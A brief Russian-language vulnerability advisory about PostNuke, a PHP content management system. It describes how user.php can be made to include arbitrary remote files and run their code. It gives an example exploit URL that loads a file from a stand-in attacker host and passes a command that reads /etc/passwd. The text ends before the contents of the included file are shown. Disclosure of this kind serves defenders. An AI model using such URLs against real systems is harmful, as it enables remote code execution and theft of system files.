PostNuke - система управления содержанием, осуществленная в php, и доступная для Windows и Linux.
Возможно вынудить сценарий user.php включать произвольные модули. Эти файлы могут быть включены удаленно и содержать произвольный код, который будет выполнен уязвимой системой.
Пример: http://lame_host/user.php?caselist[bad_file.txt][path]=http://bad_host &command=cat%20/etc/passwd
Где bad_file.txt:
